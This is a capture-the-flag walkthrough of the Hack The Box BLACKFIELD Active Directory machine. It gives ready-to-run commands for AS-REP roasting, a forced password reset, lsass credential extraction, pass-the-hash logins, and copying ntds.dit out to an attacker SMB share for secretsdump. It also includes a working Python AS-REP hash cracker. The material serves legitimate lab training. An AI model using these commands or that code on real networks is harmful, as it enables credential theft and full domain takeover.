Where Notes Work
BLACKFIELD – HACKTHEBOX
This is a write-up/walkthrough of the BLACKFIELD Active Directory machine from Hack The Box.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 00:47:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Domain: BLACKFIELD.LOCAL, NetBIOS name: DC01
Shares found on SMB:
smbclient -L 10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Listing the profiles$ share showed a long list of empty directories whose names are usernames. Copied the whole listing into a file named users.txt and pulled out the first column with awk (after dropping the `.` and `..` entries and the trailing block-count line, which are not usernames):
awk '{print $1}' users.txt > usernames.txt
With that username list, checked for accounts that have Kerberos pre-authentication disabled (AS-REP roasting) using impacket's GetNPUsers. Such accounts hand out an AS-REP encrypted with the user's own key without any proof of the password, so the encrypted blob can be cracked offline. The user support came back with an AS-REP hash:
impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -usersfile usernames.txt -format hashcat -outputfile result.hash
Got the hash of the support user.
Cracked it offline with john and the rockyou.txt wordlist, which recovered the password #00^BlackKnight (used in the BloodHound step below).
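To make visible what john actually does with each rockyou candidate, here is an added example (not code from the original write-up, and not impacket's or john's own code): an offline checker for the etype 23 (RC4-HMAC) `$krb5asrep$23$` lines that GetNPUsers writes in hashcat format. It implements MD4 in pure Python (hashlib's md4 is often disabled under OpenSSL 3), derives the NT hash as the Kerberos key, and verifies a candidate by decrypting the enc-part and recomputing the HMAC-MD5 checksum. Assumptions: key usage 8 for the AS-REP enc-part (what Windows KDCs, hashcat and john use, rather than RFC 4120's 3), and since the real support hash is not on the page, the sample line is constructed with `forge_asrep_line` and the made-up password `Winter2020!`.

```python
# Added example: offline AS-REP roast check for $krb5asrep$23$ lines (RC4-HMAC).
# Not from the original write-up; key usage 8 and the sample hash are assumptions.
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & MASK & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                # one MD4 step; rotating the names reproduces the a/d/c/b update order
                a, b, c, d = d, rol((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_ASREP = 8  # assumption: Windows uses 8 for the AS-REP enc-part (RFC 4120 says 3)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, "md5").digest()


def parse_asrep_line(line: str):
    """Split '$krb5asrep$23$user@REALM:checksum$edata' into (principal, checksum, edata)."""
    head, _, body = line.strip().partition(":")
    if not head.startswith("$krb5asrep$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) hashes are supported")
    checksum_hex, _, edata_hex = body.partition("$")
    return head[len("$krb5asrep$23$"):], bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def asrep_check_password(checksum: bytes, edata: bytes, password: str) -> bool:
    """RFC 4757: K1 = HMAC(K, usage), K3 = HMAC(K1, checksum), plaintext = RC4(K3, edata).
    The password is right iff HMAC(K1, plaintext) reproduces the KDC's checksum."""
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_ASREP))
    plaintext = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def crack_asrep(line: str, wordlist):
    """Return (principal, password) for the first candidate that verifies, else None."""
    principal, checksum, edata = parse_asrep_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if asrep_check_password(checksum, edata, candidate):
            return principal, candidate
    return None


def forge_asrep_line(principal: str, password: str, enc_part: bytes) -> str:
    """Encrypt an enc-part the way the KDC would for this password (used only to
    construct sample input; a real line comes from GetNPUsers)."""
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_ASREP))
    data = os.urandom(8) + enc_part  # 8-byte confounder, then the plaintext
    checksum = _hmac_md5(k1, data)
    edata = rc4(_hmac_md5(k1, checksum), data)
    return f"$krb5asrep$23${principal}:{checksum.hex()}${edata.hex()}"


if __name__ == "__main__":
    # Constructed sample: fake support AS-REP with a made-up password, not the real hash.
    sample = forge_asrep_line("support@BLACKFIELD.LOCAL", "Winter2020!", b"\x30" * 40)
    print(crack_asrep(sample, ["password", "letmein", "Winter2020!", "Summer2020"]))
```

On a real line from result.hash, replace the constructed sample with the file contents and the wordlist with `open("/usr/share/wordlists/rockyou.txt", encoding="latin-1")`; the check per candidate is one MD4, three HMAC-MD5s and one RC4, which is why john and hashcat get through rockyou.txt in seconds and why pre-auth must not be disabled on any account.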
Then used ldapsearch with these credentials to enumerate further. The query produced a long result set but nothing useful, so moved on.
After that, used bloodhound.py to enumerate the domain with the found credentials:
/opt/BloodHound.py/bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -v --zip -c All -ns 10.10.10.192
Set up BloodHound and uploaded the zip file. Querying the shortest path from owned principals to the user audit2020 showed that support has ForceChangePassword over audit2020, i.e. support can reset that user's password without knowing the current one.
Looking into how to exercise that right, found that the password can be reset over SAMR with rpcclient:
rpcclient -U support 10.10.10.192
Set a new password (23 is the SAMR information level UserInternal4Information, which carries the new password; this overwrites the existing password, so on a real engagement it is a noisy, destructive action that should be agreed beforehand):
rpcclient $> setuserinfo2 audit2020 23 hacker@1337
After that, tried to connect over WinRM with evil-winrm as audit2020, but it did not work. Checked share access with these credentials instead, and audit2020 turned out to have access to the forensic share:
crackmapexec smb 10.10.10.192 -u audit2020 -p 'hacker@1337' --shares
Dumped everything from the forensic share with smbclient:
$ smbclient //10.10.10.192/forensic -U audit2020%'hacker@1337'
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
Looking through the files, found memory dumps of several processes, including lsass, and found an article on extracting credentials from an lsass.DMP file.
Unzipped lsass.zip (make sure the whole lsass.zip was downloaded; a truncated dump will not parse) and used pypykatz to extract the credential material. Note that here this is the NT hash only: the WDIGEST entry below shows no cleartext password.
pypykatz lsa minidump lsass.DMP
After parsing the dump with pypykatz, found the NT hash of user svc_backup:
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
With the NT hash of svc_backup, logged in with evil-winrm using pass-the-hash and got the user flag:
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Found that svc_backup is a member of the "Backup Operators" group. Members get SeBackupPrivilege and SeRestorePrivilege, so they can read any file on the system regardless of its ACL (and write files back on restore), which on a domain controller means the NTDS database is reachable:
net user svc_backup /domain
whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Created a diskshadow script file (.dsh) with the commands diskshadow will run: take a persistent shadow copy of C: without involving VSS writers, then expose it as drive Z:.
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
Converting .dsh file to DOS format.
unix2dos kunal.dsh
Then uploaded the file with evil-winrm's upload command and ran diskshadow with the script, which creates a shadow copy of C: and exposes it as Z: (NTDS.dit is locked on the live volume, but can be read from the snapshot):
diskshadow /s kunal.dsh
diskshadow exposed the shadow copy of C: as drive Z:.
Copied ntds.dit out of the snapshot with robocopy in backup mode (/B uses SeBackupPrivilege to bypass the ACL on the NTDS folder):
robocopy /B Z:\Windows\NTDS . ntds.dit
After that, tried to pull ntds.dit with evil-winrm's download command, but it kept failing, so started an SMB server with impacket-smbserver and copied ntds.dit to the Linux machine instead.
Starting the SMB server on Linux (share name "share", serving the current directory):
impacket-smbserver -smb2support share .
copying the ntds.dit file.
copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit
secretsdump needs the SYSTEM hive as well as ntds.dit, because the boot key stored in SYSTEM decrypts the password hashes in the database, so saved the hive from the registry:
reg save hklm\system system.hive
Downloaded the system.hive also to linux machine.
impacket-secretsdump -ntds ntds.dit -system system.hive local
With the Administrator NT hash from the secretsdump output, connected as Administrator with evil-winrm using pass-the-hash:
evil-winrm -u administrator -H "184fb5e5178480be64824d4cd53b99ee" -i 10.10.10.192
If you face any problems, let me know in the comments.